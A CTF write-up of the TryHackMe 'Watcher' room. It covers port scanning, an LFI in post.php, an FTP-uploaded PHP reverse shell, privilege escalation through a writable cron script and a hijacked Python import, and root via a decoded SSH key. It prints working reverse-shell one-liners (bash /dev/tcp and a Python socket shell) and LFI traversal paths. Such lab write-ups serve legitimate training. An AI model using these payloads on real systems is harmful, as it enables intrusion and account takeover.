Watcher — Try Hack Me

Ajay Mandal
4 min readAug 19, 2021

Hi folks, I am going to share a writeup of a very good and common privilege escalation room on TryHackMe, named Watcher. It is recommended for beginners who are learning privilege escalation.

Initial Rust Scan

rustscan -a <ip> -- -A -sC -sV

Everything after -- is passed through to nmap (-A already implies -sC and -sV, so they are redundant here but harmless). Found 3 open ports: FTP (21), SSH (22) and HTTP (80).

Browsing to the site on port 80 gives a page, though nothing useful on its own.

Directory Bruteforce

gobuster dir -u http://<ip>:80 -w <path to wordlist> -x php,php3,html,txt

I am running gobuster with the wordlist

SecLists/Discovery/Web-Content/directory-list-2.3-small.txt

and specifying the file extensions to look for with -x.

Got robots.txt

Browsing to http://<ip>:80/robots.txt gives us the path to flag_1.txt.

Local File Inclusion Vulnerability

The post parameter of post.php includes whatever file name it is given, with no restriction on the path, which is a Local File Inclusion (LFI). Reading the hint provided through the link helps a lot:

http://<ip>/post.php?post=secret_file_do_not_read.txt

This file gives the username and password for FTP on port 21.

ftp <ip> 21

Here the 'files' directory lets us upload. Let us upload a PHP reverse shell: I will be using the well-known Pentestmonkey php-reverse-shell script. Change the IP in the script to our own TryHackMe VPN IP; I have changed the port to 4444 too. Then move to the files directory and upload it (the file to be uploaded must be in the directory the ftp client was started from):

cd files
put shell.php

We keep a netcat listener running on our machine to catch the reverse shell.

nc -nvlp 4444

Now we have to execute the uploaded file through the same include, so browse to

http://<ip>/post.php?post=../../../../../../../home/ftpuser/ftp/files/shell.php

We get a reverse shell; let's stabilize it

python3 -c 'import pty;pty.spawn("/bin/bash")'

Let's find the location of all the flags (the pattern is quoted so the shell does not expand it before find sees it)

find / -type f -name 'flag_*.txt' 2>/dev/null

Found them.

We can read flag2 and flag3. Let's escalate to the 4th flag.

Let's check what sudo permissions we have

sudo -l

It shows that we may run /bin/bash as user toby. Let's do that so we have access to toby's files.

sudo -u toby /bin/bash

Let's check the system crontab (/etc/crontab) for jobs that touch toby's home directory.

This job is running as "mat" and we can edit /home/toby/jobs/cow.sh, so we can make it give us a reverse shell as user "mat". Append the following line to cow.sh, using the IP of our own attacking machine:

echo '/bin/bash -i >& /dev/tcp/10.0.0.1/9999 0>&1' >> /home/toby/jobs/cow.sh

Here 10.0.0.1 stands for our attacking machine's TryHackMe VPN IP and 9999 is the port we will listen on.

Listening on port 9999

nc -nvlp 9999

The next time cron runs the job (nothing needs to be typed in toby's shell for this) we get a reverse shell as user 'mat'.

Again checking what sudo permissions we have

sudo -l 

Here, mat may run /home/mat/scripts/will_script.py with python3 as user will. That script imports cmd.py from the same directory, and cmd.py is writable by mat; since Python loads modules from the script's own directory before anything else, appending a payload to cmd.py gives us a shell as will. Let's run the following (10.0.0.1 again being our own attacking IP):

echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' >> /home/mat/scripts/cmd.py

Listening on port 1234

nc -nvlp 1234

Executing will_script.py as will (the trailing 1 is just the argument the script expects)

sudo -u will /usr/bin/python3 /home/mat/scripts/will_script.py 1

We get a reverse shell as user 'will'.
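Both escalations above follow the same pattern: a job that runs as another user (the cron entry for cow.sh running as mat, and will_script.py run as will through sudo) depends on a file we can write. The script below is an added example, not part of the original writeup or the room, that enumerates both cases generically: crontab entries running as someone else whose program is writable by us, and sibling modules imported by a Python script that are writable by us. It runs against a constructed fixture in a temp directory (the paths, user names and file contents are made up for the demo); on a target you would point it at /etc/crontab and the real script.

```shell
#!/usr/bin/env bash
# Added example (not from the original writeup): enumerate writable
# dependencies of jobs that run as another user, the pattern behind both
# the cow.sh cron job (runs as mat) and will_script.py (run as will via sudo).
set -u

# Print every system-crontab entry (fields: m h dom mon dow user command)
# that runs as a different user and whose program we can write to.
writable_cron_targets() {
    local crontab="$1" me target
    me=$(id -un)
    # drop comments, blank lines and VAR=value settings
    grep -Ev '^[[:space:]]*(#|$|[A-Za-z_]+=)' "$crontab" |
    while read -r m h dom mon dow user cmd; do
        [ "$user" = "$me" ] && continue
        target=${cmd%% *}                      # first word is the program run
        if [ -w "$target" ]; then
            printf '%s runs as %s and is writable\n' "$target" "$user"
        fi
    done
}

# For a python script we can run as another user, print sibling modules it
# imports that we can write to. Python searches the script's own directory
# first, so a writable cmd.py next to will_script.py is what gets loaded.
writable_imports() {
    local script="$1" dir mod
    dir=$(dirname "$script")
    grep -Eo '^[[:space:]]*(import|from)[[:space:]]+[A-Za-z_][A-Za-z0-9_]*' "$script" |
    awk '{print $2}' | sort -u |
    while read -r mod; do
        if [ -w "$dir/$mod.py" ]; then
            printf '%s imports %s.py which is writable\n' "$script" "$mod"
        fi
    done
}

# Constructed fixture mimicking the layout seen on the box (all made up):
# a job as "mat" whose script we own, one as ourselves (ignored), one whose
# script does not exist (not writable), and a script importing a sibling cmd.py.
make_fixture() {
    local d
    d=$(mktemp -d)
    mkdir -p "$d/jobs" "$d/scripts"
    printf '#!/bin/bash\necho moo\n' > "$d/jobs/cow.sh"
    printf '#!/bin/bash\necho mine\n' > "$d/jobs/mine.sh"
    cat > "$d/crontab" <<EOF
# constructed sample in the format of /etc/crontab
PATH=/usr/local/bin:/usr/bin:/bin
* * * * * mat $d/jobs/cow.sh
* * * * * $(id -un) $d/jobs/mine.sh
*/5 * * * * mat /nonexistent/backup.sh
EOF
    # hypothetical will_script.py that imports a sibling cmd.py
    printf 'import os\nimport sys\nimport cmd\n\nprint(cmd.run(sys.argv[1]))\n' > "$d/scripts/will_script.py"
    printf 'def run(arg):\n    return "cmd " + arg\n' > "$d/scripts/cmd.py"
    printf '%s\n' "$d"
}

demo=$(make_fixture)
writable_cron_targets "$demo/crontab"
writable_imports "$demo/scripts/will_script.py"
rm -rf "$demo"
```

Note that the -w test answers for the user running the script, so run it from the shell you actually hold (toby for the cron check, mat for the sudo script check); as root it reports everything as writable.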

Getting Root

Listing files owned by the adm group, which will is a member of

find / -group adm 2>/dev/null

Here we see a file named key.b64. Let's view it

cat /opt/backups/key.b64

Decoding the key (it is only base64-encoded, not encrypted) into a file named key

base64 -d /opt/backups/key.b64 > key

We get an SSH private key, so let's log in with it. SSH refuses a key file that other users can read, so restrict its permissions first

chmod 400 key

Now, ssh with this key

ssh -i key root@<iP>

We are logged in as root and can read flag_7.txt.

Thanks for reading so far!!

Ajay Mandal

Security Researcher | Computer Engineering Spec. IOT | Hack The Box Player